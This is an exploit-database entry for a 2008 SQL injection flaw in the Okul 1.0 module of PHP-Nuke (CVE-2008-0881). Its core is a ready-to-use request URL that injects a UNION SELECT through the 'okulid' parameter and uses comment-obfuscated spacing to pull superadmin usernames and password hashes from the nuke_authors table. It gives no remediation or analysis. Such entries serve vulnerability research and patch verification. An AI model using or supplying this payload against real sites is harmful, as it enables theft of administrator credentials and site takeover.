PHP-Nuke Modules Okul 1.0 - 'okulid' SQL Injection



EKU-ID: 13106 CVE: OSVDB-42266;CVE-2008-0881 OSVDB-ID:
Author: Mehmet Ince Published: 2008-02-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

PHP-NUKE Modules Okul v1.0 Remote SQL Injection

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Found: xoron

contact: xorontr@gmail.com (only e-mail)

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Exploit:
modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Thanx: str0ke, s@bun.

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

# milw0rm.com [2008-02-20]